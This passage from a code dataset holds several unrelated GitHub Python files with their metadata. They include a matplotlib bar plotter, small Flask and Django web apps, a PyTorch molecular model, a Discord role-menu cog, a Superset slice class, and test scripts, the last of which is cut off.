% (comIdx + 1)]\r\n \r\n if nonEmptyIterable(yRange):\r\n yError = np.zeros((lenSol, 2, len(y[0])))\r\n for r in range(lenSol):\r\n for c in range(len(y[r])):\r\n yError[r][0][c] = y[r][c] - yRange[r][c][0] # lower\r\n yError[r][1][c] = yRange[r][c][1] - y[r][c] # upper\r\n else:\r\n yerror = get('yError' if comIdx == 0 else 'yError%d' % (comIdx + 1), None)\r\n \r\n if yerror:\r\n yError = np.zeros((lenSol, 2, len(y[0])))\r\n for r in range(lenSol):\r\n for c in range(len(y[r])):\r\n yError[r][0][c] = yerror[r][c][1] # lower\r\n yError[r][1][c] = yerror[r][c][0] # upper\r\n else:\r\n yError = None\r\n \r\n highContrast = get(\"highContrast\", False)\r\n \r\n for solIdx in range(lenSol):\r\n normalIdx = (lenComp - 1 - comIdx) * lenSol + solIdx\r\n transpos = normalIdx // lenSol + normalIdx % lenSol * lenComp\r\n rects[transpos] = ax.bar(\r\n envIndex - groupWidth / 2 + (width + marginBars) * (solIdx + 0.5),\r\n y[solIdx], width - marginBars,\r\n bottom=oldy[solIdx],\r\n color='none' if highContrast else colors[comIdx * lenSol + solIdx],\r\n edgecolor=colors[comIdx * lenSol + solIdx] if highContrast else \"black\",\r\n hatch=['/', '\\\\', '-', '+', 'x', '.', 'o', 'O', '*', '//', '\\\\\\\\'][\r\n comIdx * lenSol + solIdx] if highContrast else None,\r\n ecolor='r', yerr=yError[solIdx] if yError is not None else None)\r\n oldy += y\r\n \r\n ax.set_xlim([0 - groupWidth / 2 - paddingLeft, len(envList) - 1 + groupWidth / 2 + paddingRight])\r\n if len(components):\r\n if lenSol == 1:\r\n legendTitles = components\r\n else:\r\n legendTitles = [None] * (\r\n lenComp * lenSol) # list((com + ' - ' + sol for sol, com in itertools.product(solList, components, )))\r\n for comIdx in range(lenComp):\r\n for solIdx in range(lenSol):\r\n normalIdx = (lenComp - 1 - comIdx) * lenSol + solIdx\r\n transpos = normalIdx // lenSol + normalIdx % lenSol * lenComp\r\n legendTitles[transpos] = components[comIdx] + ' - ' + solList[solIdx]\r\n \r\n # print(components[comIdx] + ' - ' + solList[solIdx], (lenComp - 1 - comIdx, solIdx), normalIdx, transpos)\r\n else:\r\n legendTitles = solList\r\n \r\n if get(\"showLegend\", True):\r\n font = FontProperties(weight='regular', size=get('legendFontSize', 20))\r\n \r\n if get(\"legendLoc\", None) is None and get(\"legendOutside\", True):\r\n ax.legend(rects, legendTitles, prop=font, bbox_to_anchor=(0, 1.02, 1, 0.2 * lenComp),\r\n loc=\"lower left\", mode=\"expand\", borderaxespad=0, ncol=lenSol, handlelength=1)\r\n else:\r\n ax.legend(rects, legendTitles, frameon=False, loc=get('legendLoc', 'best'), prop=font,\r\n ncol=get('legendColumn', 1), handlelength=1)\r\n \r\n font = FontProperties(weight='regular', size=get('xFontSize', 20))\r\n ax.set_xlabel(get('xTitle', \"\"), fontproperties=font)\r\n \r\n ticks = get('yTicks&Labels', None)\r\n if get('ySci'):\r\n ax.ticklabel_format(style='sci', axis='y', scilimits=get('ySci'))\r\n else:\r\n ax.ticklabel_format(style='plain', axis='y')\r\n \r\n if ticks:\r\n if len(ticks) == 2 and nonEmptyIterable(ticks[0]) and nonEmptyIterable(ticks[1]):\r\n ax.set_yticks(ticks[0])\r\n ax.set_yticklabels(ticks[1])\r\n else:\r\n ax.set_yticks(ticks)\r\n \r\n ax.get_yaxis().set_major_formatter(matplotlib.ticker.ScalarFormatter())\r\n ax.get_yaxis().set_minor_formatter(matplotlib.ticker.NullFormatter())\r\n \r\n ticks = get('xTicks&Labels', None)\r\n if ticks:\r\n ax.tick_params(which='minor', length=0)\r\n if len(ticks) == 2 and nonEmptyIterable(ticks[0]) and nonEmptyIterable(ticks[1]):\r\n ax.set_xticks(ticks[0])\r\n ax.set_xticklabels(ticks[1])\r\n else:\r\n ax.set_xticks(ticks)\r\n ax.set_xticklabels([str(i) for i in ticks])\r\n else:\r\n ax.set_xticks(envIndex)\r\n ax.set_xticklabels(envList)\r\n \r\n font = FontProperties('sans-serif', weight='regular', size=get('xFontSize', 20) - 4)\r\n for tick in ax.xaxis.get_major_ticks():\r\n tick.label.set_fontproperties(font)\r\n if get('xTickRotate', False):\r\n tick.label.set_rotation(45)\r\n \r\n font = FontProperties(weight='regular', size=get('yFontSize', 20))\r\n ax.set_ylabel(get('yTitle', \"\"), fontproperties=font)\r\n \r\n font = FontProperties('sans-serif', weight='regular', size=get('yFontSize', 20) - 4)\r\n for tick in ax.yaxis.get_major_ticks():\r\n tick.label.set_fontproperties(font)\r\n \r\n if get('xLog', False):\r\n ax.set_xscale('log')\r\n \r\n if get('yLog', False):\r\n ax.set_yscale('log')\r\n \r\n if get('yGrid', False):\r\n ax.yaxis.grid(True)\r\n \r\n lim = get('yLimit', [])\r\n if len(lim) > 0:\r\n realLimit = lim.copy()\r\n \r\n for i in range(2):\r\n if callable(lim[i]):\r\n realLimit[i] = lim[i](ax.get_ylim()[i])\r\n \r\n ax.set_ylim(realLimit)\r\n \r\n lim = get('xLimit', [])\r\n if len(lim) > 0:\r\n ax.set_xlim(lim)\r\n \r\n subAxes = []\r\n for subfigure in get('subfigures', []):\r\n from .plot import Ploter\r\n subAxes.append(Ploter().plot(subfigure, fig, ax))\r\n \r\n # TODO add subfigures\r\n \r\n try:\r\n fig.tight_layout()\r\n except:\r\n pass\r\n \r\n if get('output', False):\r\n fig.savefig('dist/' + name + '.pdf', format='pdf', dpi=dpi, bbox_inches=\"tight\")\r\n \r\n plt.show(block=False)\r\n # plt.close('all')\r\n axes.append(ax)\r\n \r\n return axes\r\n\r\n\r\nif __name__ == '__main__':\r\n ParallelBars().draw(data)\r\n \r\n while True:\r\n plt.pause(0.5)\r\n","repo_name":"sshi27/plot","sub_path":"parallel_bar.py","file_name":"parallel_bar.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10744214492","text":"from flask import Flask, json, render_template, request\nimport os\n\n# create instance of Flask app\napp = Flask(__name__)\n\n\n# decorator\ndef hello():\n # it is a good idea to include information on how to use your API on the home route\n # this is just another way to do that\n text = f\"go to /locations to see all events
\\\n and /location/ to see all data of a location
\\\n and /location/ to add additional locations\"\n return text\n\n\n@app.route(\"/locations\")\ndef all():\n json_url = \"metadata.json\"\n data_json = json.load(open(json_url))\n # render_template is always looking in templates folder\n return render_template('index.html', html_page_text=data_json)\n\n\n@app.route(\"/location/\", methods=['GET', 'POST'])\ndef add_location(location_name):\n json_url = \"metadata.json\"\n if request.method == 'GET':\n data_json = json.load(open(json_url))\n data = data_json['locations']\n location = request.view_args['location_name']\n output_data = [x for x in data if x['Location'] == location_name]\n\n # render template is always looking in tempate folder\n return render_template('location_display.html', html_page_text=output_data)\n elif request.method == 'POST':\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n new_location = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n data_json[\"locations\"].append(new_location)\n file.seek(0)\n json.dump(data_json, file, indent=4)\n\n # Adding text\n text_success = \"Data successfully added: \" + str(new_location)\n return render_template('index.html', html_page_text=text_success)\n\n\n@app.route(\"/deleteLocation/\", methods=['DELETE'])\ndef del_location(location_name):\n json_url = \"metadata.json\"\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n new_location = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n for i in range(len(data_json[\"locations\"])):\n if data_json[\"locations\"][i][\"Location\"] == location_name and \\\n data_json[\"locations\"][i][\"SubCategory\"] == subcategory:\n del data_json[\"locations\"][i]\n break\n file.seek(0)\n with open(json_url, \"w\") as writefile:\n json.dump(data_json, writefile, indent=4)\n\n # Adding text\n text_success = \"Data successfully removed: \" + str(new_location)\n return render_template('index.html', html_page_text=text_success)\n\n\n@app.route(\"/updateLocation/\", methods=['PATCH'])\ndef update_location(location_name):\n json_url = \"metadata.json\"\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n\n new_location = request.form['new_location_name']\n new_department = request.form['new_department']\n new_category = request.form['new_category']\n new_subcategory = request.form['new_subcategory']\n\n existing_entry = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n new_entry = {\"Location\": new_location,\n \"Department\": new_department,\n \"Category\": new_category,\n \"SubCategory\": new_subcategory\n }\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n # get_data = data_json[\"locations\"][1][\"SubCategory\"]\n for i in range(len(data_json[\"locations\"])):\n if data_json[\"locations\"][i][\"Location\"] == location_name and \\\n data_json[\"locations\"][i][\"Department\"] == department and \\\n data_json[\"locations\"][i][\"Category\"] == category and \\\n data_json[\"locations\"][i][\"SubCategory\"] == subcategory:\n check_in = data_json[\"locations\"][i]\n data_json[\"locations\"][i] = new_entry\n break\n file.seek(0)\n check_in = data_json\n with open(json_url, \"w\") as writefile:\n json.dump(data_json, writefile, indent=4)\n\n # Adding text\n text_success = \"Data successfully updated: \" + str(check_in)\n return render_template('index.html', html_page_text=text_success)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"AnuNGupta/InmarCode","sub_path":"Problem_1/Endpoints.py","file_name":"Endpoints.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"36987639381","text":"import sqlite3\nfrom flask import Flask, render_template, url_for\nimport os\napp = Flask(__name__)\n#try:\n #conn = sqlite3.connect('new')\n #print (\"Opened SQL DB\")\n#except Exception as e:\n #print(\"Error during connection :\",str(e))\n#results = conn.execute(\"SELECT * FROM Device\")\n#for row in results:\n #print (row)\n \n\n\n@app.route('/employ')\ndef employ():\n\n conn = sqlite3.connect('new')\n #mycursor = conn.cursor(dictionary=True)\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n results = conn.execute(\"SELECT * FROM Device\")\n employees = results.fetchall()\n #print(employees)\n return render_template('view.html', employees=employees)\n\n conn.close()\n \n","repo_name":"Praveensreedhar/SQLite_PROJ","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33228923896","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^books/$', views.books, name='books'),\n url(r'^add/$', views.add, name='add'),\n url(r'^addBook/$', views.addBook, name='addBook'),\n url(r'^books/(?P\\d+)$', views.bookReview, name='bookReview'),\n url(r'^addReview/(?P\\d+)$', views.addReview, name='addReview'),\n url(r'^user/(?P\\d+)$', views.user, name='user'),\n url(r'^delete/(?P\\d+)$', views.delete, name='delete')\n]\n","repo_name":"randyhperez/DojoAssignments","sub_path":"Python/django/belt_reviewer/apps/booksApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19640542317","text":"import torch\nfrom torch import nn\n\nfrom src.models.FlexSchNet import Flexible_latent_SchNet\n\nfrom src.models.common import CrossAttentionType, CrossAttentionLayer, Head\nfrom src.datamodules import DataBatch\nfrom src.huggingmolecules import RMatConfig\nfrom src.huggingmolecules.models import RMatModel\nfrom src.huggingmolecules.models.models_common_utils import clones\nfrom src.models.rmat_rmat import RmatRmatModel\n\n\nclass RMatSchNetModel(RmatRmatModel):\n def __init__(self,\n lr: float = 1e-3,\n cross_attention_type: CrossAttentionType = CrossAttentionType.NONE,\n rmat_config: RMatConfig = RMatConfig.get_default(use_bonds=False),\n latent_size: int = None,\n schnet_latent_size: int = None,\n targets=[],\n thresholds={},\n activity_importance=0.0,\n **kwargs,\n ):\n if schnet_latent_size is None:\n schnet_latent_size = rmat_config.d_model\n if latent_size is None:\n latent_size = (rmat_config.d_model+schnet_latent_size)//2\n super().__init__(self,\n cross_attention_type=cross_attention_type,\n rmat_config=rmat_config,\n latent_size=latent_size,\n targets=targets,\n thresholds=thresholds,\n activity_importance=activity_importance,\n **kwargs)\n # TODO: config?\n self.target_net = Flexible_latent_SchNet(latent_size=schnet_latent_size)\n in_size = rmat_config.d_model + schnet_latent_size\n self.aggregator = nn.Sequential(\n nn.Linear(\n in_features=in_size,\n out_features=in_size,\n ),\n # nn.BatchNorm1d(2 * rmat_config.d_model),\n nn.ReLU(),\n nn.Linear(in_features=in_size, out_features=latent_size),\n # nn.BatchNorm1d(latent_size),\n )\n\n def forward(self, x):\n ligand_batch = x[\"data\"].ligand_features\n target_batch = x[\"data\"].target_features\n # PL logger requires it to be float\n self.log(\n \"train_num_ligand_nodes\",\n float(x[\"data\"].ligand_features.node_features.size(1)),\n )\n # self.log(\n # \"train_num_target_nodes\",\n # float(x[\"data\"].target_features.node_features.size(1)),\n # )\n\n ligand_batch_mask = (\n torch.sum(torch.abs(ligand_batch.node_features), dim=-1) != 0\n )\n target_batch_mask = (\n torch.ones_like(ligand_batch_mask)\n )\n\n ligand_latent = self.ligand_net.src_embed(ligand_batch.node_features)\n target_latent = self.target_net(z=target_batch.node_z,\n pos=target_batch.node_pos,\n batch=target_batch.batch)\n\n ligand_distances_matrix = self.ligand_net.dist_rbf(\n ligand_batch.distance_matrix\n )\n # target_distances_matrix = self.target_net.dist_rbf(\n # target_batch.distance_matrix\n # )\n target_latent = target_latent.unsqueeze(1)\n\n if self.hparams.rmat_config.use_bonds:\n ligand_edges_att = torch.cat(\n (\n ligand_batch.bond_features,\n ligand_batch.relative_matrix,\n ligand_distances_matrix,\n ),\n dim=1,\n )\n else:\n ligand_edges_att = target_edges_att = None\n\n for (\n ligand_rmat_encoder_layer,\n # target_rmat_encoder_layer,\n ligand_ca_layer,\n target_ca_layer,\n ) in zip(\n self.ligand_net.encoder.layers,\n # self.target_net.encoder.layers,\n self.ligand_ca_layers,\n self.target_ca_layers,\n ):\n ligand_latent = ligand_rmat_encoder_layer(\n ligand_latent, ligand_batch_mask, edges_att=ligand_edges_att\n )\n\n if self.hparams.cross_attention_type in [\n CrossAttentionType.LIGAND,\n CrossAttentionType.BOTH,\n ]:\n new_ligand_latent = ligand_ca_layer(\n target_latent,\n ligand_latent,\n ligand_batch_mask,\n edges_att=None,\n edges_att_v=ligand_edges_att,\n )\n else:\n new_ligand_latent = ligand_latent\n if self.hparams.cross_attention_type in [\n CrossAttentionType.TARGET,\n CrossAttentionType.BOTH,\n ]:\n new_target_latent = target_ca_layer(\n ligand_latent,\n target_latent,\n target_batch_mask,\n edges_att=ligand_edges_att,\n edges_att_v=None,\n )\n else:\n new_target_latent = target_latent\n ligand_latent, target_latent = new_ligand_latent, new_target_latent\n\n ligand_encoded = self.ligand_net.encoder.norm(ligand_latent)\n # target_encoded = self.target_net.encoder.norm(target_latent)\n target_encoded = target_latent\n # Aggregating from dummy node\n latent_code = self.aggregator(\n torch.cat([ligand_encoded[:, 0, :], target_encoded[:, 0, :]], dim=1)\n )\n output = self.get_head_outputs(latent_code, x)\n\n return output\n","repo_name":"remilvus/DrugRepositioning","sub_path":"src/models/schnet_rmat.py","file_name":"schnet_rmat.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"9744435814","text":"from pyboard import *\n\n\ndef test_1():\n \"\"\"First test. Start up of project.\"\"\"\n board = Board(3, 3, blank_spaces=True)\n board.numerate()\n print(board)\n\n\ndef test_2():\n \"\"\"\n Implemented:\n -Board now can be defined with an array\n -Is now possible edit the values (only update)\n \"\"\"\n data = [\n [1, 2, 3],\n [1, 2, 3]\n ]\n board = Board(3, 3, data=data)\n board[0][0] = None\n board[1][2] = None\n board.numerate()\n print(board)\n\n\ndef test_3():\n \"\"\"\n Implemented:\n -Board now can build itself or receive an array with data with no problems.\n -New method get dims implemented: If data is passed, it auto gets the dimensions.\n \"\"\"\n data = [\n [9, 2, 3],\n [1, 2, 3]\n ]\n # board = Board() -> Exception: Board is empty\n board = Board(3, 3)\n board2 = Board(data=data)\n print(board)\n print(board.get_dims(), '\\n')\n print(board2)\n\n\n# Upside tests will probably don't work.\n\n\ndef test_4():\n \"\"\"\n Implemented:\n The data argument is now validated, and now, need to be a list of Line's.\n All lines must have the same number of elements.\n \"\"\"\n \"\"\" Working\n board = Board(3, 3)\n print(type(board[0]) is Line)\n print(board) \n \"\"\"\n data1 = [ # Falling\n [9, 2, 3],\n [1, 2, 3]\n ]\n data2 = [ # Working\n Line([9, 2, 3]),\n Line([1, 2, 3])\n ]\n data3 = [ # Falling\n Line([9, 2, 3, 7]),\n Line([1, 2, 3])\n ]\n board = Board(data=data2)\n print(board)\n\n\ndef test_5():\n \"\"\"\n Implemented:\n -Computing columns.\n \"\"\"\n data = [\n Line([9, 2, 3]),\n Line([1, 7, 1]),\n Line([6, 1, 2]),\n Line([3, 2, 0]),\n Line([4, 8, 9]),\n ]\n b = Board(data=data)\n print(b.columns)\n\n\ndef test_6():\n \"\"\"\n Implemented:\n -Align Columns in print\n \"\"\"\n data = [\n Line(['Xp0--', 3332, 132]),\n Line(['life-', 72, 13]),\n Line([6, 1000, 2]),\n Line([333, 2, 400]),\n Line([4, 8, 9]),\n ]\n b = Board(data=data)\n # print(b.standard_impress())\n print(b)\n\n\ndef test_7():\n \"\"\"\n Implemented:\n -Board validation is now a property\n -pseudo private atributes turned into public\n \"\"\"\n data = [\n [1, 2, 3],\n [1, 2, 3, 4]\n ]\n b = Board(data=data)\n print(b)\n\n\ndef test_8():\n \"\"\"\n Implemented:\n -Board is now iterable\n \"\"\"\n b = Board(3, 3)\n b.numerate()\n for line in b:\n for obj in line:\n print(obj)\n\n\ndef test_9():\n \"\"\"\n Board\n Implemented:\n -Columns attr now updates\n -Column object discarded, turned into a list\n -Is now possible iterate over board\n -Append method implemented\n Bug Fix:\n -Aligned impress TypeError\n\n Line\n Implemented:\n -Size limited. Append don't work when the value reaches the max.\n -__get_item__ doesn't raise exceptions.\n \"\"\"\n b = Board(3, 3)\n b.numerate()\n b.append(Line(data=[9, 9, 9]))\n print(b)\n\n\ndef test_10():\n \"\"\"\n Board\n Changed:\n -Update is now do by a method.\n -Board setter now check all elements.\n -Method order organized.\n Implemented:\n - __len__()\n\n Line\n Changed:\n -Length limit was changed by open/close system.\n \"\"\"\n b = Board(3, 3)\n b.numerate()\n print(b.get_dims())\n b.append(Line(data=[9, 9, 9]))\n print(b.get_dims())\n # b[0].append(1) # Exception: The Line is closed. It can' receive more elements.\n\n\n test_10()\n","repo_name":"KevBoyz/PyBoard","sub_path":"tests/test_core_Board.py","file_name":"test_core_Board.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13328441006","text":"import disnake\nfrom disnake.ext import commands\nfrom disnake import ui\nimport typing\n\n# class RoleSelect(ui.Select):\n# def __init__(self, custom_id:str, options:typing.List[disnake.SelectOption], only_one:bool=False, allow_empty:bool=True, placeholder:str=\"Select\"):\n# \"\"\" Initialize a new RoleSelect handler \"\"\"\n# custom_id = \"rolemenu-\" + custom_id\n# if allow_empty: options.append(disnake.SelectOption(label=\"None\", value=\"0\"))\n# super().__init__(placeholder=placeholder, options=options, custom_id=custom_id, max_values=1 if only_one else len(options))\n# async def callback(self, interaction: disnake.ApplicationCommandInteraction): pass # handled in on_interaction below\n\nclass RoleSelectCog(commands.Cog, name='RoleSelect Cog'):\n \"\"\" This cog handles role select interactions \"\"\"\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n \n known_rolemenus = {\n \"color_roles\": [899376611814670376, 899376914333040701, 899376964937322566, 899377152728903711, 899378077317091378, 899377212153815041, 899377291510050846, 899377342756044810, 899377501137150012, 899378012204707851, 899377632473415721, 899377900233588746, 899377826376056882],\n \"pronouns\": [899371117666521178, 899371152877711441, 899371185329037322, 899371222083731508, 899371302614343731, 957976015207014410, 899372444735905843, 899401124031914044, 957976073231011840],\n \"pings\": [957985234136227890, 957985334157799524],\n \"dms\": [957985376922927135, 957985444568641566],\n \"graduation_year\": [899383365382320149, 899383402074083359, 899383430406602782, 998406336180146220],\n \"vent\": [903681643548672020],\n \"lgbt\": [1039151271371874314],\n \"server_pings\": [900006786013224970, 900006978926039070, 904931272445554698]\n }\n\n @commands.Cog.listener(\"on_interaction\")\n async def on_interaction(self, interaction: disnake.ApplicationCommandInteraction):\n if interaction.type == disnake.InteractionType.component:\n if interaction.data['custom_id'][0:9] == \"rolemenu-\":\n _, label = interaction.data['custom_id'].split('-')\n if label not in self.known_rolemenus:\n raise ValueError(f\"Unknown rolemenu {label}! Something has gone wrong!\")\n print(\"DEV Received data from rolemenu\", label)\n roles = [int(i) for i in self.known_rolemenus[label]]\n uroles = [r.id for r in interaction.user.roles]\n vroles = [int(r) for r in interaction.data['values']]\n text = \"\"\n for ri in roles:\n ro = interaction.guild.get_role(ri)\n if ro is not None:\n if ri not in uroles and ri in vroles:\n text += f\"✅ Gave role {ro.mention}\\n\"\n await interaction.user.add_roles(ro)\n elif ri in uroles and ri not in vroles:\n text += f\"✅ Removed role {ro.mention}\\n\"\n await interaction.user.remove_roles(ro)\n else:\n text += f\"Could not find role {ri}, something has gone wrong!\"\n if text != \"\":\n await interaction.response.send_message(\n embed=disnake.Embed(\n description=\"\\n\"+text,\n color=disnake.Color.green()\n ), ephemeral=True)\n else:\n await interaction.response.send_message(\n embed=disnake.Embed(\n description=\"\\n⚠️ No new roles to grant or revoke!\\n\",\n color=disnake.Color.yellow()\n ), ephemeral=True)\n \n\n ## EXAMPLE command to create a role menu\n # @commands.slash_command(name=\"generate-rolemenu\")\n # async def make_rolemenu(self, interaction: disnake.ApplicationCommandInteraction):\n # options = [\n # disnake.SelectOption(label=\"Vent channel access\", value=\"903681643548672020\"),\n # ]\n # options2 = [\n # disnake.SelectOption(label=\"LGBTQ :D\", value=\"1039151271371874314\")\n # ]\n # view = ui.View()\n # view.add_item(RoleSelect(options=options, custom_id=\"vent\", only_one=True, allow_empty=True, placeholder=\"Vent channel access\"))\n # view.add_item(RoleSelect(options=options2, custom_id=\"lgbt\", only_one=True, allow_empty=True, placeholder=\"🌈❓\"))\n # await interaction.channel.send(embed=disnake.Embed(\n # title=\"Other Roles\",\n # color=disnake.Color.from_rgb(0, 0, 0)\n # ), view=view)\n # await interaction.response.send_message(\"Created rolemenu.\", delete_after=5, ephemeral=True)\n\n\n# needed per cog\ndef setup(bot):\n bot.add_cog(RoleSelectCog(bot))","repo_name":"Kalamuwu/PAServer_v2","sub_path":"cogs/roleselect.py","file_name":"roleselect.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"25386750842","text":"from m4i_analytics.m4i.portal.model.superset.slices.AbstractSlice import AbstractSlice\n\nclass TableSlice(AbstractSlice):\n \n VIZ_TYPE = 'table'\n \n def _init_params(self, all_columns=[]\n , all_columns_x=None\n , all_columns_y=None\n , annotation_layers=None\n , bar_stacked=None\n , bottom_margin=None\n , cache_timeout=None\n , canvas_image_rendering=None\n , charge=None\n , code=None\n , collapsed_fieldsets=None\n , color_scheme=None\n , columns=[]\n , combine_metric=None\n , compare_lag=None\n , compare_suffix=None\n , contribution=None\n , country_fieldtype=None\n , datasource=None\n , date_filter=None\n , domain_granularity=None\n , donut=None\n , druid_datasource_id=None\n , entity=None\n , filters=[]\n , granularity=None\n , granularity_sqla=None\n , groupby=[]\n , having=''\n , include_search=False\n , include_time=False\n , instant_filtering=False\n , labels_outside=None\n , left_margin=None\n , limit=None\n , line_interpolation=None\n , linear_color_scheme=None\n , link_length=None\n , mapbox_style=None\n , markup_type=None\n , max_bubble_size=None\n , metric=None\n , metric_2=None\n , metrics=[]\n , min_periods=None\n , normalize_across=None\n , num_period_compare=None\n , number_format=None\n , order_bars=None\n , order_by_cols=[]\n , order_desc=True\n , page_length=0\n , pandas_aggfunc=None\n , period_ratio_type=None\n , pie_label_type=None\n , pivot_margins=None\n , reduce_x_ticks=None\n , resample_fillmethod=None\n , resample_how=None\n , resample_rule=None\n , rich_tooltip=None\n , rolling_periods=None\n , rolling_type=None\n , rotation=None\n , row_limit=None\n , secondary_metric=None\n , series=None\n , show_bar_value=None\n , show_brush=None\n , show_bubbles=None\n , show_controls=None\n , show_druid_time_granularity=None\n , show_druid_time_origin=None\n , show_legend=None\n , show_markers=None\n , show_sqla_time_column=None\n , show_sqla_time_granularity=None\n , since=''\n , size=None\n , size_from=None\n , size_to=None\n , slice_id = None\n , slice_name = None\n , subdomain_granularity=None\n , subheader=None\n , table_filter=False\n , table_timestamp_format=None\n , time_compare=None\n , time_grain_sqla=None\n , timeseries_limit_metric=None\n , until='now'\n , url_params=None\n , viz_type=None\n , where=''\n , whisker_options=None\n , x=None\n , x_axis_bounds=None\n , x_axis_format=None\n , x_axis_label=None\n , x_axis_showminmax=None\n , x_log_scale=None\n , xscale_interval=None\n , y=None\n , y_axis_bounds=None\n , y_axis_format=None\n , y_axis_label=None\n , y_axis_showminmax=None\n , y_log_scale=None\n , yscale_interval=None\n , *arg\n , **kwarg):\n self.all_columns = all_columns\n self.collapsed_fieldsets = collapsed_fieldsets\n self.filters = filters\n self.granularity_sqla = granularity_sqla\n self.groupby = groupby\n self.having = having\n self.include_search = include_search\n self.include_time = include_time\n self.metrics = (metrics if metrics else []) + [combine_metric, metric, metric_2, secondary_metric]\n self.order_by_cols = order_by_cols\n self.order_desc = order_desc\n self.page_length = page_length\n self.row_limit = row_limit\n self.since = since\n self.table_filter = table_filter\n self.table_timestamp_format = table_timestamp_format\n self.time_grain_sqla = time_grain_sqla\n self.timeseries_limit_metric = timeseries_limit_metric\n self.until = until\n self.where = where\n # END _init_params\n \n def columnNames(self):\n return list(set(super(TableSlice, self).columnNames() + self.groupby + self.order_by_cols + self.all_columns))\n # END directColumnDependencies\n \n# END TableSlice\n","repo_name":"aureliusenterprise/analytics-library","sub_path":"m4i_analytics/m4i/portal/model/superset/slices/TableSlice.py","file_name":"TableSlice.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"10040602127","text":"from django.urls import path, include\n\nfrom . import views\n\napp_name = 'projects'\n\nurlpatterns = [\n path('', views.projects, name='projects'),\n path('browse/', include('browse.urls')),\n path('new/', views.new, name='new'),\n path('/images/', views.images, name='images'),\n path('/', views.detail, name='detail'),\n path('/edit/', views.edit, name='edit'),\n path('/enchance/', views.enhance, name='enhance'),\n]","repo_name":"enzosupreme/cbp","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"12219421335","text":"import os\nfrom definitions import *\n\n#function to return list of persons from a directory\ndef getPersons(dirName):\n fullDirName = IMAGE_FOLDER_PATH + '/' + dirName\n print(fullDirName)\n persons = [name for name in os.listdir(fullDirName)\n if os.path.isdir(os.path.join(fullDirName, name))]\n return persons\n \n#print(getPersons('Students'))\n\n# function to return list of pictures of a person from a directory \ndef getPersonPictures(friendName, folderName):\n fullDirName = IMAGE_FOLDER_PATH + '/' + folderName + '/' + friendName\n #personPictures = [file for file in os.listdir(fullDirName) if file.endswith(\".jpg\") or file.endswith(\".jpeg\")]\n personPictures = [fullDirName + '/' + file \n for file in os.listdir(fullDirName) if file.endswith(\".jpg\") or file.endswith(\".jpeg\")]\n #print(personPictures)\n return personPictures\n\n#print(getPersonPictures('Nethra', 'Students'))\n\n# function to read image\ndef readImage(filePath):\n with open( filePath, 'rb' ) as f:\n data = f.read()\n return data\n\n#readImage(os.path.dirname(os.path.realpath(__file__)) + '/' + 'Students' + '/Nethra/'+'Nethra4.jpeg')","repo_name":"amitakamat/CMPE-295A-Campus-Safety-using-fog-computing","sub_path":"sample/fileHelpers.py","file_name":"fileHelpers.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"37188716961","text":"import sys\nfrom pathlib import Path\n\nimport pytest\n\nfrom inmanta import const\nfrom pytest_inmanta.handler import DATA\n\n\ndef test_resource(project):\n assert not project.unittest_resource_exists(name=\"res\")\n\n with pytest.raises(KeyError):\n project.unittest_resource_get(name=\"res\")\n\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"x\")\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\")\n\n assert project.unittest_resource_exists(name=\"res\")\n value = project.unittest_resource_get(name=\"res\")\n assert value[\"desired_value\"] == \"x\"\n\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"y\")\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\", change=const.Change.updated)\n value = project.unittest_resource_get(name=\"res\")\n assert value[\"desired_value\"] == \"y\"\n\n project.compile(\n \"\"\"\n import unittest\n\n unittest::Resource(name=\"res\", desired_value=\"y\", purged=true)\n \"\"\"\n )\n project.deploy_resource(\"unittest::Resource\")\n assert not project.unittest_resource_exists(name=\"res\")\n\n\ndef test_resource_fail_skip(project):\n project.compile(\n \"\"\"\n import 